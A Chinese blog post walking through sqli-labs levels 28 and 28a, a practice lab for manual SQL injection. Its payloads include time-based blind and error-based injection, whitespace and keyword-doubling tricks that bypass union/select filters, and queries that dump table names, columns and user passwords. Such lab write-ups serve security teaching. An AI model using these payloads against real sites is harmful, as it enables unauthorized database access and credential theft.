(手工)【sqli-labs28、28a】字符型注入、盲注、过滤

已于 2022-07-14 19:02:37 修改
阅读量1k 收藏 1
点赞数 1
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
于 2022-07-14 11:10:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125773579
版权

目录

推荐:

一、(手工)SQL注入基本步骤:

二、Less28(GET-Blind based - All your UNION & SELECT belong to us  -string single quote with Parenthesis)

2.1、简介:(过滤-盲注-字符型注入)

2.2、第一步:注入点测试

 2.3、第二步:分析过滤

2.4、第三步:判断字段数

2.5、第四步:暴库

2.6、第五步:爆表名

2.7、第六步:爆字段

2.8、第七步:爆数据

三、Less28a(GET-Blind based - All your UNION & SELECT belong to us  -single quote -Parenthesis )

3.1、简介:(过滤-盲注-字符型注入)

3.2、特点:

推荐:

【SQL注入-无回显】时间盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165776808616780366570315%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165776808616780366570315&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450

【SQL注入-无回显】布尔盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165770191616781818723356%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165770191616781818723356&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E5%B8%83%E5%B0%94&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165770191616781818723356%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165770191616781818723356&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E5%B8%83%E5%B0%94&spm=1018.2226.3001.4450

【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501

【WAF绕过】SQL注入、文件上传、XSShttps://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450

一、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:爆数据

二、Less28(GET-Blind based - All your UNION & SELECT belong to us  -string single quote with Parenthesis)

2.1、简介:(过滤-盲注-字符型注入)

请求方法:GET

方法:过滤+闭合(字符型注入)+盲注

2.2、第一步:注入点测试

输入?id=1 

 后面加上单引号发现报错了

说明是单引号闭合,即是字符型注入

且可利用报错回显

用2个单引号前后闭合后

显示正常

 测试注入语句是否正常

?id=1'%26%26sleep(3)%26%26'1

发现浏览器一直转,而不是转3s

并最终报错

猜测是不是有括号未闭合(或获取源码)

?id=1')%26%26sleep(3)%26%26('1

转3s,且显示正常

语句被顺利执行

 2.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)

方法二:

获取源码进行白盒审计(最优)

方法三:

eg:输入?id=and or union select --+ updatexml # extractvalue(重要的都输进去)

看输入回显过滤语句的情况

通过一顿操作后

最后可以知道被过滤的字符有

 – , # , 空格 , /,+

union(大小写都过滤)、select(大小写都过滤)

替代空格:

%09  TAB 键(水平)

%0a  新建一行

%0c  新的一页

%0d  return 功能

%0b  TAB 键(垂直)

%a0  空格

空格换成 ||

注释被过滤掉了,就可以使用拼接进语句,将2侧进行闭合

union和select可以使用双写

2.4、第三步:判断字段数

?id=0')union(select%0d1,2,'3

2.5、第四步:暴库

?id=1')%26%26extractvalue(1, concat(0x7e, database()))%26%26('1

?id=0')unIon%0BSelEcT%0B1,database(),3||('1

报错提示:期望我的这个id=1是资源

考虑变换注入语句格式,或者使用时间盲注

 时间盲注:

?id=1')%26%26if(database()='security', sleep(3), 1)%26%26('1

2.6、第五步:爆表名

 ?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1

2.7、第六步:爆字段

?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1

2.8、第七步:爆数据

?id=0')union(select%0d1,(select(group_concat(username,password))from(users)),'3

三、Less28a(GET-Blind based - All your UNION & SELECT belong to us  -single quote -Parenthesis )

3.1、简介:(过滤-盲注-字符型注入)

请求方法:GET

方法:过滤+闭合(字符型注入)+盲注

3.2、特点:

')字符型注入

过滤了union、select、注释、斜杠

还比第28少了空格等

黑色地带(崛起)
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值